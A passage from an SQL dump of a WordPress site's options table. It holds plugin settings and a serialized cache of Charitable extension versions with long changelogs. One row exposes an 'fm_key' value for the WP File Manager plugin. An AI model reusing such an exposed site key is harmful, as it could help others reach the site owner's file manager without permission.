04:49:09','yes'),(370358,'arm_lite_version_updated_date_4.0.23','2024-01-05 04:48:30','yes'),(373576,'woocommerce_task_list_tracked_completed_actions','a:1:{i:0;s:10:\"appearance\";}','yes'),(373604,'plugin_activation_wp-file-manager/file_folder_manager.php','2024-01-10 12:09:48','yes'),(373605,'fm_key','fgXKCsRcSE8ioJGt17MFqYdBx','yes'),(401673,'forminator_action_scheduler_db_updated','1','yes'),(401679,'woocommerce_product_match_featured_image_by_sku','no','yes'),(401680,'woocommerce_feature_order_attribution_enabled','yes','yes'),(401719,'arm_lite_version_updated_date_4.0.26','2024-02-27 05:05:42','yes'),(402046,'wpc_plugin_versions','a:2:{s:7:\"expires\";i:1747427874;s:4:\"data\";a:30:{i:0;a:11:{s:11:\"download_id\";s:3:\"526\";s:4:\"name\";s:25:\"Charitable Simple Updates\";s:11:\"new_version\";s:5:\"1.3.1\";s:4:\"slug\";s:25:\"charitable-simple-updates\";s:3:\"url\";s:78:\"https://www.wpcharitable.com/extensions/charitable-simple-updates/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-09-24 11:01:49\";s:8:\"homepage\";s:66:\"https://www.wpcharitable.com/extensions/charitable-simple-updates/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:0:{}s:8:\"sections\";s:1416:\"a:2:{s:11:\"description\";s:108:\"<p>Share updates about your campaigns and display them in a widget, with a shortcode or a PHP function.</p>\n\";s:9:\"changelog\";s:1248:\"<p>1.3.1<br />\n<em>September 24, 2024</em></p>\n<ul>\n<li>Added missing display_cover_fees_formatted() function which was causing a fatal in certain scenarios when a donation was being made.</li>\n</ul>\n<p>1.3.0<br />\n<em>August 1, 2024</em></p>\n<ul>\n<li>Updated compatibility with visual campaign builder.</li>\n</ul>\n<p>1.2.0<br />\n<em>January 16, 2020</em></p>\n<ul>\n<li>Updated with improved compatibility for Ambassadors 2.0.</li>\n<li>Get the current Updates in the Ambassadors campaign form when editing a campaign.</li>\n</ul>\n<p>1.1.4<br />\n<em>May 14, 2019</em></p>\n<ul>\n<li>Execute shortcodes inside updates output.</li>\n</ul>\n<p>1.1.3<br />\n<em>October 13, 2016</em></p>\n<ul>\n<li>Fixed a PHP notice that could happen in the Campaign Updates widget.</li>\n</ul>\n<p>1.1.2<br />\n<em>May 10, 2016</em></p>\n<ul>\n<li>Fixed bug that prevented translations from working on the public side of the site.</li>\n</ul>\n<p>1.1.1<br />\n<em>November 3, 2015</em></p>\n<ul>\n<li>Properly format updates content in widgets, to include line breaks &amp; paragraphs.</li>\n<li>Respects the \"Hide if no updates\" option in the widget.</li>\n</ul>\n<p>1.1.0<br />\n<em>October 26, 2015</em></p>\n<ul>\n<li>Add a standalone section in the campaign form for updates.</li>\n</ul>\n\";}\";}i:1;a:11:{s:11:\"download_id\";s:3:\"530\";s:4:\"name\";s:22:\"Charitable User Avatar\";s:11:\"new_version\";s:5:\"1.0.7\";s:4:\"slug\";s:22:\"charitable-user-avatar\";s:3:\"url\";s:75:\"https://www.wpcharitable.com/extensions/charitable-user-avatar/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-07-07 09:06:59\";s:8:\"homepage\";s:63:\"https://www.wpcharitable.com/extensions/charitable-user-avatar/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:0:{}s:8:\"sections\";s:1412:\"a:2:{s:11:\"description\";s:109:\"<p>Add a community feel to your website by giving your donors the ability to upload their profile photo.</p>\n\";s:9:\"changelog\";s:1243:\"<p>1.0.7<br />\n<em>April 7, 2020</em></p>\n<ul>\n<li>Fix fatal error encountered when submitting campaign with Ambassadors 2.0.1.</li>\n</ul>\n<p>1.0.6<br />\n<em>January 14, 2020</em></p>\n<ul>\n<li>Update to provide compatibility with Ambassadors 2.0.</li>\n</ul>\n<p>1.0.5<br />\n<em>August 23, 2017</em></p>\n<ul>\n<li>Prevented the default gravatar from showing in the profile &amp; campaign forms for users who do not have a gravatar. Instead, users will see an upload field.</li>\n</ul>\n<p>1.0.4<br />\n<em>August 10, 2017</em></p>\n<ul>\n<li>Fixed a bug that resulted in uploaded avatars getting lost in profile form updates.</li>\n</ul>\n<p>1.0.3<br />\n<em>April 20, 2017</em></p>\n<ul>\n<li>Fixed a bug that made it impossible to remove a profile image without replacing it.</li>\n</ul>\n<p>1.0.2<br />\n<em>May 10, 2016</em></p>\n<ul>\n<li>Fixed bug that prevented translations from working on the public side of the site.</li>\n<li>Added support for upcoming changes to picture form fields in Charitable.</li>\n</ul>\n<p>1.0.1<br />\n<em>September 8, 2015</em></p>\n<ul>\n<li>Remove reference to user dashboard addon. This is now part of Charitable core (not an addon).</li>\n</ul>\n<p>1.0.0<br />\n<em>August 18, 2015</em></p>\n<ul>\n<li>Initial release.</li>\n</ul>\n\";}\";}i:2;a:11:{s:11:\"download_id\";s:3:\"724\";s:4:\"name\";s:30:\"Charitable Anonymous Donations\";s:11:\"new_version\";s:7:\"1.3.1.3\";s:4:\"slug\";s:30:\"charitable-anonymous-donations\";s:3:\"url\";s:83:\"https://www.wpcharitable.com/extensions/charitable-anonymous-donations/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-11-04 09:45:45\";s:8:\"homepage\";s:71:\"https://www.wpcharitable.com/extensions/charitable-anonymous-donations/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:0:{}s:8:\"sections\";s:2306:\"a:2:{s:11:\"description\";s:78:\"<p>Let your donors support you without having their name listed publicly.</p>\n\";s:9:\"changelog\";s:2169:\"<p>1.3.1.3<br />\n<em>November 3, 2024</em></p>\n<ul>\n<li>Update translations, add additional security in code output.</li>\n</ul>\n<p>1.3.1.2<br />\n<em>October 30, 2024</em></p>\n<ul>\n<li>Code cleanup.</li>\n</ul>\n<p>1.3.1<br />\n<em>September 25, 2019</em></p>\n<ul>\n<li>Remove the tooltip from the admin donation form.</li>\n</ul>\n<p>1.3.0<br />\n<em>September 18, 2019</em></p>\n<ul>\n<li>Added email tag to display whether donor made donation anonymously.</li>\n<li>Added tooltip to donation form field to explain what keeping a donation anonymous means.</li>\n</ul>\n<p>1.2.2<br />\n<em>January 29, 2019</em></p>\n<ul>\n<li>Fixed invalid HTML in the anonymous donations field.</li>\n</ul>\n<p>1.2.1<br />\n<em>December 13, 2017</em></p>\n<ul>\n<li>Improved the way we track whether a particular donor is anonymous, including in situations where the donor record is not for a specific donation (i.e. grouped donations).</li>\n<li>Ensured that when grouped donations are used, the donation amount is correctly formatted.</li>\n</ul>\n<p>1.2.0<br />\n<em>November 14, 2017</em></p>\n<ul>\n<li>Add support for creating anonymous donations in the admin. Only supported with Charitable 1.5+.</li>\n<li>Allow donations to be grouped by donor in Donor Widget or [charitable_donors] shortcode while still respecting donor anonymity. Only supported with Charitable 1.5+.</li>\n<li>Show anonymous donor details to site admin in the donations table and donation details pages in the WordPress dashboard, as well as emails.</li>\n</ul>\n<p>1.1.3<br />\n<em>August 12, 2016</em></p>\n<ul>\n<li>Fixed bug related to a new Donations Query class in Charitable 1.4.</li>\n</ul>\n<p>1.1.2<br />\n<em>May 10, 2016</em></p>\n<ul>\n<li>Fixed bug that prevented translations from working on the public side of the site.</li>\n</ul>\n<p>1.1.1<br />\n<em>November 24, 2015</em></p>\n<ul>\n<li>A minor update that is required to avoid conflicts with the next version of Charitable. Please upgrade!</li>\n</ul>\n<p>1.1.0<br />\n<em>November 3, 2015</em></p>\n<ul>\n<li>Added seamless integration with the soon-to-be-released Easy Digital Downloads extension.</li>\n<li>Fixed bug that prevented licenses from activating correctly.</li>\n</ul>\n\";}\";}i:3;a:11:{s:11:\"download_id\";s:3:\"930\";s:4:\"name\";s:17:\"Charitable Videos\";s:11:\"new_version\";s:5:\"1.1.3\";s:4:\"slug\";s:17:\"charitable-videos\";s:3:\"url\";s:70:\"https://www.wpcharitable.com/extensions/charitable-videos/?changelog=1\";s:12:\"last_updated\";s:19:\"2025-02-25 04:57:39\";s:8:\"homepage\";s:58:\"https://www.wpcharitable.com/extensions/charitable-videos/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:0:{}s:8:\"sections\";s:1115:\"a:2:{s:11:\"description\";s:63:\"<p>Give your fundraising campaign a boost by adding video.</p>\n\";s:9:\"changelog\";s:994:\"<p>== Changelog ==</p>\n<p>1.1.3<br />\n<em>February 25, 2025</em></p>\n<ul>\n<li>Add missing file.</li>\n</ul>\n<p>1.1.2<br />\n<em>April 5, 2024</em></p>\n<ul>\n<li>Tweaks to allow mp4 self hosted videos to be embedded in visual builder.</li>\n</ul>\n<p>1.1.1</p>\n<ul>\n<li>Adjustment to templates when videos not showing on the front-end in 1.8.0+ in some scenarios.</li>\n</ul>\n<p>1.1.0<br />\n<em>November 1, 2023</em></p>\n<ul>\n<li>Updates related to Campaign Builder release in Charitable 1.8.0.</li>\n</ul>\n<p>1.0.1<br />\n<em>September 10, 2020</em></p>\n<ul>\n<li>Update script dependency to jQuery.</li>\n</ul>\n<p>1.0.0<br />\n<em>November 3, 2016</em></p>\n<ul>\n<li>Official public release.</li>\n<li>Added the ability to upload videos directly to the site.</li>\n</ul>\n<p>0.9.3<br />\n<em>May 10, 2016</em></p>\n<ul>\n<li>Fixed bug that prevented translations from working on the public side of the site.</li>\n</ul>\n<p>0.9.20150805<br />\n<em>August 5, 2015</em></p>\n<ul>\n<li>Initial beta release.</li>\n</ul>\n\";}\";}i:4;a:11:{s:11:\"download_id\";s:3:\"935\";s:4:\"name\";s:22:\"Charitable Ambassadors\";s:11:\"new_version\";s:5:\"2.3.0\";s:4:\"slug\";s:22:\"charitable-ambassadors\";s:3:\"url\";s:75:\"https://www.wpcharitable.com/extensions/charitable-ambassadors/?changelog=1\";s:12:\"last_updated\";s:19:\"2025-04-15 16:33:36\";s:8:\"homepage\";s:63:\"https://www.wpcharitable.com/extensions/charitable-ambassadors/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"7.0\";s:10:\"charitable\";s:6:\"1.6.51\";}s:8:\"sections\";s:27350:\"a:2:{s:11:\"description\";s:112:\"<p>Charitable Ambassadors transforms your website into a peer-to-peer fundraising or crowdfunding platform.</p>\n\";s:9:\"changelog\";s:27177:\"<p>2.3.0<br />\n<em>April 14, 2025</em></p>\n<ul>\n<li>Updates to be comptatible with Charitable Pro.</li>\n</ul>\n<p>2.2.11<br />\n<em>November 20, 2024</em></p>\n<ul>\n<li>Removed minor PHP 8.1+ warnings and notices.</li>\n</ul>\n<p>2.2.10<br />\n<em>November 2, 2024</em></p>\n<ul>\n<li>Added ability to use \"fundraiser_type\" and \"fundraiser_type_not\" as attributes in the campaign shortcode. Example: [campaigns number=-1 columns=2 orderby=title fundraiser_type_not=team order=ASC]</li>\n</ul>\n<p>2.2.9<br />\n<em>October 25, 2024</em></p>\n<ul>\n<li>Resolved issue with certain themes showing \"not a campaign that you can fundraise for\" message on the frontend for certain setups.</li>\n</ul>\n<p>2.2.8<br />\n<em>October 2, 2024</em></p>\n<ul>\n<li>Resolved issues saving peer to peer options in visual campaign builder.</li>\n</ul>\n<p>2.2.7<br />\n<em>September 27, 2024</em></p>\n<ul>\n<li>Fixed currency display issue in visual builder settings.</li>\n<li>Updated translation slugs in visual builder settings PHP files.</li>\n</ul>\n<p>2.2.6<br />\n<em>August 7, 2024</em></p>\n<ul>\n<li>Resolved issue when showing certain templates (such as the create campaign related ones) on recent \"block\" based themes.</li>\n</ul>\n<p>2.2.5<br />\n<em>March 25, 2024</em></p>\n<ul>\n<li>Resolved issue involving saving the \"post parent\" field in Ambassador settings when saving a campaign.</li>\n</ul>\n<p>2.2.4<br />\n<em>March 1, 2024</em></p>\n<ul>\n<li>Resolved PHP fatal errors with very old PHP versions including PHP 7.2.</li>\n</ul>\n<p>2.2.3<br />\n<em>November 2, 2023</em></p>\n<ul>\n<li>Added a check for the campaign_is_campaign_builder_admin_page function for those who haven\'t updated to Charitable 1.80.</li>\n</ul>\n<p>2.2.1<br />\n<em>November 1, 2023</em></p>\n<ul>\n<li>Fix: Resolved HTML issue that preventing marketing and payment panels from showing when Ambassadors addon was installed.</li>\n</ul>\n<p>2.2.0<br />\n<em>November 1, 2023</em></p>\n<ul>\n<li>Beta: Interface settings with Campaign Builder introduced in Charitable 1.8.0.</li>\n</ul>\n<p>2.1.21<br />\n<em>August 8, 2023</em></p>\n<ul>\n<li>Minor bug fixes and code cleanup.</li>\n</ul>\n<p>2.1.20<br />\n<em>March 14, 2023</em></p>\n<ul>\n<li>Resolved an error when a champaign type was changed and the campaign was saved in the backend but didn\'t update the new type upon reloading.</li>\n</ul>\n<p>2.1.19<br />\n<em>February 10, 2023</em></p>\n<ul>\n<li>Resolving a PHP warning upon campaign creation in same scenarios.</li>\n</ul>\n<p>2.1.18<br />\n<em>January 10, 2023</em></p>\n<ul>\n<li>Allow sending of a campaign creator campaign submitted email (if enabled) if a user has first created a campaign, then registers/verifies their account.</li>\n</ul>\n<p>2.1.17<br />\n<em>June 24, 2022</em></p>\n<ul>\n<li>Correctly remove a campaign from any teams when it has been changed from a team member fundraiser to another type of fundraiser/campaign.</li>\n<li>Fixed a bug that resulting in sorting of campaigns by amount raised to be incorrect when using commas as the decimal separator.</li>\n</ul>\n<p>2.1.16<br />\n<em>May 12, 2022</em></p>\n<ul>\n<li>Avoid fatal error when using Polylang.</li>\n<li>Change the [creator_donations] table to only show Paid donations.</li>\n</ul>\n<p>2.1.15<br />\n<em>March 2, 2022</em></p>\n<ul>\n<li>Fixes a fatal error when loading the campaign form after choosing \"Our Organization\" campaign type in a site with multiple campaign type options.</li>\n</ul>\n<p>2.1.14<br />\n<em>March 1, 2022</em></p>\n<ul>\n<li>Fixed a bug that occurred when editing campaigns / fundraisers via the front-end form. If the form included an end date field, the end date was incorrectly reset to January 23, 2000. Random, annoying, and now fixed.</li>\n<li>Translating the fundraiser type names (Individual, Team or Team Member) previously caused issues where fundraisers didn\'t record their type correctly. This has been resolved now. Users will now always see the translated type names, though the original English version is what is stored in the database.</li>\n<li>The charitable_ambassadors_campaign_types hook filters all valid campaign types. This was previously an indexed array; it is now an associative array, with the key being a lower-case, dash-separated string (i.e. team-member) and the value being the translatable readable version.</li>\n</ul>\n<p>2.1.13<br />\n<em>February 8, 2022</em></p>\n<ul>\n<li>In combination with Charitable 1.6.55, this will add compatibility with block themes such as Twenty Twenty Two.</li>\n</ul>\n<p>2.1.12<br />\n<em>December 23, 2021</em></p>\n<ul>\n<li>Remove the Peer to Peer Fundraising panel when \"Fundraisers for existing campaigns\" are not enabled. This also avoids several PHP warnings and notices that can occur on the campaign editing page.</li>\n</ul>\n<p>2.1.11<br />\n<em>November 17, 2021</em></p>\n<ul>\n<li>Check for logged in users before displaying the campaign edit link &amp; form. This catches out the very rare situation where a campaign\'s post_author value is set to 0 — something which would not ordinarily happen since every campaign has a campaign creator.</li>\n</ul>\n<p>2.1.10<br />\n<em>October 27, 2021</em></p>\n<ul>\n<li>Allow the default fundraiser image to be removed for parent campaigns in the admin so there is no default image.</li>\n<li>Small change to how the campaign donor count is returned, ensuring it returns an integer.</li>\n<li>Fixes fatal error on parent campaign pages when pretty permalinks are not being used.</li>\n</ul>\n<p>2.1.9<br />\n<em>August 17, 2021</em></p>\n<ul>\n<li>Fixed a bug that prevented new team members from joining an existing team.</li>\n<li>Resolved some discrepancies where fundraisers did not share all the settings from the parent campaigns that they should have.</li>\n<li>Ensure that the team creator\'s name is saved after they register an account after setting up their team.</li>\n</ul>\n<p>2.1.8<br />\n<em>July 20, 2021</em></p>\n<ul>\n<li>SECURITY FIX: Fixes a critical cross-site scripting vulnerability. This is related to a similar issue in the core Charitable plugin (if you have not updated Charitable to 1.6.51, please do so now). See [our blog](https://www.wpcharitable.com/blog/?utm_source=readme&amp;utm_medium=changelog-tab&amp;utm_campaign=release-notes&amp;utm_content=1-6-51-release) for a post in the coming days.</li>\n<li>Fixed a problem where changing a fundraiser to a personal cause campaign or campaign for the organization in the admin would not properly remove the campaign\'s fundraiser type (individual, team or team member). This could cause the campaign to appear in lists of campaigns where it shouldn\'t.</li>\n<li>Removed the current campaign as an option for the \"Parent Campaign\" field when editing a campaign in the admin.</li>\n</ul>\n<p>2.1.7<br />\n<em>May 21, 2021</em></p>\n<ul>\n<li>Fixed a broken link to the Join Team page in the Team Members widget.</li>\n<li>Small update to ensure compatibility with Charitable 1.7.</li>\n</ul>\n<p>2.1.6<br />\n<em>December 21, 2020</em></p>\n<ul>\n<li>Added caching to the way child campaigns are picked up for a campaign. This fixes speed issues on sites where parent campaigns have a lot of child campaigns.</li>\n<li>Fixed issue that would result in the output of the [charitable_my_campaigns] shortcode duplicating if you use the shortcode more than once on a page.</li>\n</ul>\n<p>2.1.5<br />\n<em>December 1, 2020</em></p>\n<ul>\n<li>When a team campaign is deleted, all team member campaigns are converted to Individual fundraisers. Deleted teams and team members are also cleaned up properly now, avoiding unexpected blank spaces and some PHP warnings.</li>\n<li>Fixed rewrite rules to avoid 404 errors when accessing the fundraiser/campaign editing pages.</li>\n<li>Fixed a bug that changed Team fundraisers to campaigns for the organization after saving them in the admin.</li>\n</ul>\n<p>2.1.4<br />\n<em>November 24, 2020</em></p>\n<ul>\n<li>Improve compatibility with WPML, allowing users to easily create campaigns in the non-primary language.</li>\n<li>Show team members with campaigns that have finished on a team page.</li>\n<li>Fixed a bug resulting in parent campaigns being set incorrectly for non-fundraiser campaigns.</li>\n<li>Fixed a bug when editing team member campaigns in the admin that would overwrite the linked team.</li>\n</ul>\n<p>2.1.3<br />\n<em>November 19, 2020</em></p>\n<ul>\n<li>Added Team Name to campaigns export &amp; campaign related emails.</li>\n<li>Update campaign status automatically after registration if email verification is not required.</li>\n<li>Show the action required in the \"Action Required\" emails sent to campaign creators and website admin.</li>\n<li>Show the login form for campaign creators with an existing account when they submit a campaign without being logged in.</li>\n</ul>\n<p>2.1.2<br />\n<em>November 16, 2020</em></p>\n<ul>\n<li>Use the correct currency symbol for the label of the fundraising goal field.</li>\n</ul>\n<p>2.1.1<br />\n<em>November 12, 2020</em></p>\n<ul>\n<li>Resolved error encountered when attempting to submit a campaign encountered on sites where fundraisers are disabled, but personal cause campaigns and campaigns for the organization are both enabled.</li>\n</ul>\n<p>2.1.0<br />\n<em>November 10, 2020</em></p>\n<ul>\n<li>Added option to disable the email verification step prior to submitting a campaign.</li>\n<li>The global settings to enable/disable teams and to show team members on team pages have been removed, in favour of per-campaign settings. This provides you with more control over each individual parent campaign you run.</li>\n<li>Create and edit fundraisers in the admin. You can now easily change the parent campaign, the type of fundraiser (i.e. individual, team), and other details in the WordPress dashboard.</li>\n<li>Change a team\'s captain in the WordPress dashboard.</li>\n<li>Re-assign a fundraiser to a new team in the WordPress dashboard.</li>\n<li>Added more ways to control &amp; customize parent campaigns. Choose whether teams or individual fundraisers are supported (or both), set a default goal for all fundraisers, and decide whether to hide the content field to ensure that all fundraisers have the same content.</li>\n<li>Enhanced the [campaigns] shortcode, adding the ability to pass multiple parent campaign IDs to the parent parameter.</li>\n<li>Fixed issue preventing team member campaigns from showing in a team\'s grid of members when the member\'s campaign was published via the WordPress dashboard, without the member accepting the invitation.</li>\n</ul>\n<p>2.0.10<br />\n<em>September 2, 2020</em></p>\n<ul>\n<li>Added the ability to find all donations for a parent campaign, including donations made to child campaigns.</li>\n<li>Avoid setting the creator to the current user when editing a team member\'s campaign in the admin before they have confirmed their fundraiser.</li>\n<li>Added first &amp; last name fields to the registration form shown to new team members.</li>\n<li>Fixed issue blocking the Campaign Notification email from being sent after publishing a campaign via the Submit button the campaign preview page.</li>\n<li>Avoid sending the Creator Donation Notification too early when editing a donation in the admin.</li>\n<li>Correctly pass the team ID when processing a new team member fundraiser submission.</li>\n<li>Prevent double form submissions on the campaign form.</li>\n<li>When used alongside Polylang, include translated campaign versions when counting donors and getting the donation amount.</li>\n</ul>\n<p>2.0.9<br />\n<em>July 2, 2020</em></p>\n<ul>\n<li>Ensure that the team captain\'s name is shown in the email invitation to team members.</li>\n<li>When used alongside Polylang, make sure to use correct language version of the Campaign Submission page and My Campaigns page.</li>\n<li>Fixed bug resulting in new campaign emails not getting sent for Personal Cause campaigns.</li>\n<li>Show all possible parent campaigns in campaign form parent-campaign selection field.</li>\n<li>Retain submission data on updates of a campaign.</li>\n<li>Fixed error resulting in the Campaign Creator role not being created after deactivating and then reactivating Ambassadors.</li>\n<li>Clarify that the default picture in the fundraiser form can be replaced. Requires update to Charitable 1.6.43.</li>\n<li>Allow the campaign status tags on the My Campaigns page to be translated. Requires update to Charitable 1.6.43.</li>\n</ul>\n<p>2.0.8<br />\n<em>May 26, 2020</em></p>\n<ul>\n<li>Fixed bug preventing Personal Cause campaigns from being correctly saved in certain scenarios.</li>\n</ul>\n<p>2.0.7<br />\n<em>May 25, 2020</em></p>\n<ul>\n<li>Fixed bug resulting in the origin campaign submission data being lost when saving a campaign in the admin area.</li>\n</ul>\n<p>2.0.6<br />\n<em>May 22, 2020</em></p>\n<ul>\n<li>Ensure that the campaign creator\'s email after submitting a campaign is sent properly.</li>\n<li>Avoid fatal error when activating Charitable Ambassadors without Charitable being activated.</li>\n</ul>\n<p>2.0.5<br />\n<em>May 18, 2020</em></p>\n<ul>\n<li>Ensure that the campaign submission emails for admin &amp; campaign creators are sent when the campaign is submitted.</li>\n<li>Show all teams in the fundraiser form when selecting the team you want to join.</li>\n<li>Save the Suggested Donations and Featured Image settings to Team Member campaigns. Previously this was only saved for the Team campaign, not the member campaigns.</li>\n<li>Fixed bug resulting in the campaign title being lost when editing an active campaign via the front-end form.</li>\n<li>Automatically update parent campaign for team member campaigns when the parent campaign for the team is changed.</li>\n</ul>\n<p>2.0.4<br />\n<em>April 30, 2020</em></p>\n<ul>\n<li>Avoid caching redirects to Registration, Login &amp; Email Verification pages before a campaign is submitted. On sites with browser caching active, this could cause unexpected results, with the campaign submission page becoming inaccessible. This version will fix this issue going forward, but <strong>please note that any visitors who have already had the redirection cached in their browser will need to clear their browser cache.</strong></li>\n<li>Fix incorrect redirect after logging in to an existing account when accounts are required before submitting a campaign.</li>\n<li>Remove \"Raising funds for...\" block at the top of campaigns for the organization. This block should only be shown on fundraisers that have a parent campaign.</li>\n<li>Validate email addresses when a campaign is submitted.</li>\n</ul>\n<p>2.0.3<br />\n<em>April 17, 2020</em></p>\n<ul>\n<li>Avoid error about missing \'recipient\' field when no parent campaigns exist yet.</li>\n<li>Prevent infinite loop when Profile page has the [charitable_submit_campaign] shortcode.</li>\n<li>If the homepage is set up as the Campaign Submission page, don\'t require users to register an account first. This avoids an automatic redirect from the homepage to a registration form.</li>\n<li>Assign the \"Campaign Creator\" role to creators after they log in.</li>\n<li>Ensure that permalinks are flushed on plugin activation.</li>\n</ul>\n<p>2.0.2<br />\n<em>April 8, 2020</em></p>\n<ul>\n<li>Ensure that campaign creators have registered and verified their email address before they can submit a campaign, if the \"Require User Account\" setting is enabled.</li>\n<li>Fixed a bug where the action required when a user registers an account following their campaign submission is not updated. This prevented the campaign from being correctly linked to their account, as well as resulting in emails not getting sent to the campaign creator.</li>\n<li>Resolved an error encountered in the Donors widget when the widget is set to show donors for the current campaign but the user is viewing a non-campaign page.</li>\n<li>When previewing a new campaign submission, a campaign creator\'s account would be incorrectly published after if they complete an email verification step.</li>\n</ul>\n<p>2.0.1<br />\n<em>April 4, 2020</em></p>\n<ul>\n<li>The Campaigns table in the WordPress dashboard now shows a campaign\'s Parent Campaign as well as its Team.</li>\n<li>Added filtering &amp; exporting options to the Campaigns page in the WordPress dashboard. This allows you to filter campaigns by parent campaign and the type of campaign. These changes will require updating to Charitable 1.6.36.</li>\n<li>Add the Team ID to the Donations export file.</li>\n<li>In some cases, the campaign form\'s \"Who Are You Raising Money For?\" page would show up completely blank. This has now been fixed.</li>\n<li>Added better checks for whether required fields are filled out in the campaign form.</li>\n<li>Fixed a bug where the Campaign Submission Page would show a list of blog posts instead of the campaign form. If you are experiencing this issue, please flush your permalinks by going to Settings &gt; Permalinks and clicking on the button to update the settings (you do not need to change any settings).</li>\n</ul>\n<p>2.0.0<br />\n<em>March 7, 2020</em></p>\n<ul>\n<li><strong>Fundraisers!</strong> Fundraisers are a special type of campaign created to raise funds for an existing campaign. This feature allows you to create parent campaigns which people can fundraise for. You can create as many parent campaigns as you would like. The fundraiser form is a simplified version of the front-end campaign form.</li>\n<li><strong>Teams!</strong> When setting up a new fundraiser, your campaign creators can create teams and join other teams.</li>\n<li><strong>Email marketing!</strong> Now you can automatically add campaign creators to your mailing list. This feature requires Newsletter Connect and uses the \"contact consent\" feature in Charitable.</li>\n<li>Tweak the campaign form with new admin settings. Easily tweak how campaign creators select categories or tags for their campaigns, how they set an end date, and whether they can provide their own suggested donation options.</li>\n<li>Solved a long-standing issue preventing non-logged-in users from creating a campaign. You can now set up the campaign creation flow to require users to create an account before they submit their campaign, or after. When a campaign creator submits a campaign without being logged in, they will be prompted to log in, register and/or verify their email address after they have submitted their fundraising campaign.</li>\n<li>More emails: There are new emails available to send to campaign creators when their campaign is approved, when it has ended or when it requires action before it can be published (i.e. they need to log in, register or verify their email address). Admin can also receive an email when a campaign still requires some kind of action from its campaign creator.</li>\n<li>Loads more bug fixes!</li>\n<li>Added Dutch translation.</li>\n</ul>\n<p>1.1.18<br />\n<em>December 12, 2017</em></p>\n<ul>\n<li>Fixed bug preventing donation notifications from sending to Ambassadors.</li>\n<li>Fixed a bug that prevented the form from redirecting to the campaign submission success page.</li>\n</ul>\n<p>1.1.17<br />\n<em>November 30, 2017</em></p>\n<ul>\n<li>Allow donation notifications for campaign creators to be resent via the donation details page. Requires Charitable 1.5.6.</li>\n<li>Added \"Status\" column to the creator donations table.</li>\n<li>Fixed notice on campaign form.</li>\n<li>Fixed incorrect redirects after logging in.</li>\n<li>Prevent fatal error on Relevanssi build index.</li>\n<li>Prevent an issue where redirecting to the homepage after submitting a campaign results in the wrong template being loaded.</li>\n<li>Fixed several HTML validation errors.</li>\n</ul>\n<p>1.1.16<br />\n<em>August 1, 2017</em></p>\n<ul>\n<li>Prevent Charitable from using its end date sanitization for public campaign submissions. Ambassadors does its own sanitization for these.</li>\n<li>Pre-emptively fixing a bug that will break the Donors widget in Charitable 1.5.</li>\n</ul>\n<p>1.1.15<br />\n<em>June 23, 2017</em></p>\n<ul>\n<li>Send the campaign notification emails to the admin and campaign creator after the campaign has been added completely, including the meta and taxonomies. Previously, emails were sent before the campaign meta and taxonomies were saved, which resulted in some shortcode values (like the campaign goal) not being available in the email.</li>\n<li>Fixed a bug that in some cases resulted in the campaign creator name was shown in the Donation Notification email.</li>\n<li>Switch to `prop()` in Javascript to avoid use of deprecated `attr()` function.</li>\n</ul>\n<p>1.1.14<br />\n<em>April 25, 2017</em></p>\n<ul>\n<li>Added support for recurring donations. Go to Charitable &gt; Settings &gt; Ambassadors to enable the option for your campaign creators to add campaigns with recurring donation support. Requires Recurring Donations.</li>\n<li>Fixed a bug that made it impossible to remove a featured image without replacing it.</li>\n<li>Improved the campaign form UI to make it clearer how ongoing campaigns can be added.</li>\n<li>Ensure that the campaign creator donation notification always goes to their primary email address, rather than the email address used when they first donated.</li>\n</ul>\n<p>1.1.13<br />\n<em>April 8, 2017</em></p>\n<ul>\n<li>Removes testing code left over in 1.1.12 release.</li>\n</ul>\n<p>1.1.12<br />\n<em>April 7, 2017</em></p>\n<ul>\n<li>Fixed a bug that prevented campaign creators from submitting endless campaigns by entering 0 for the length.</li>\n</ul>\n<p>1.1.11<br />\n<em>February 23, 2017</em></p>\n<ul>\n<li>Make sure the campaign\'s short description is picked up in the campaign form, even if the campaign was created via the WordPress dashboard.</li>\n</ul>\n<p>1.1.10<br />\n<em>January 16, 2017</em></p>\n<ul>\n<li>Show the campaign creator\'s display name to avoid issues with showing the donor name.</li>\n<li>Sanitize the donated amount for campaigns.</li>\n</ul>\n<p>1.1.9<br />\n<em>January 5, 2017</em></p>\n<ul>\n<li>Fixes a bug in campaign saving form that prevents campaigns being updated when no core fields are kept in the form</li>\n<li>Fixes an issue that broke customized campaign forms that use an end date field instead of a length field. This use-case now works correctly.</li>\n</ul>\n<p>1.1.8<br />\n<em>September 14, 2016</em></p>\n<ul>\n<li>Fixes up an issue that caused campaign end dates to be lost when a campaign is edited via the front-end campaign form.</li>\n</ul>\n<p>1.1.7<br />\n<em>September 6, 2016</em></p>\n<ul>\n<li>The latest version of Charitable changed the way campaign end dates are sanitized before being saved, but this inadvertently broke campaigns submitted via Charitable Ambassadors. We have tidied up that bug.</li>\n<li>We also resolved an edge case scenario where campaigns submitted via a campaign form missing a length or end date field would not show up in the `[campaigns]` output until they were saved/updated via the WordPress dashboard.</li>\n</ul>\n<p>1.1.6<br />\n<em>August 16, 2016</em></p>\n<ul>\n<li>Follow-up fix for 1.1.5. Yesterday\'s release contained out-dated minified Javascript. This fix has updated the minified Javascript files.</li>\n</ul>\n<p>1.1.5<br />\n<em>August 15, 2016</em></p>\n<ul>\n<li>Fixes a Javascript error that prevented suggested donations from being added related to changes in Charitable 1.4.</li>\n<li>Improves how tags/categories are saved, so that it\'s possible to convert them to select fields without problems.</li>\n<li>Improves how the user fields are saved when a campaign is submitted; if you have customized the form to completely remove all user fields, the campaign creator will still be set correctly.</li>\n</ul>\n<p>1.1.4<br />\n<em>July 8, 2016</em></p>\n<ul>\n<li>Tags were never showing up as a field in the campaign submission form -- even when you have tags. Bug squashed.</li>\n</ul>\n<p>1.1.3<br />\n<em>June 21, 2016</em></p>\n<ul>\n<li>Fixed a fatal error that occurred on 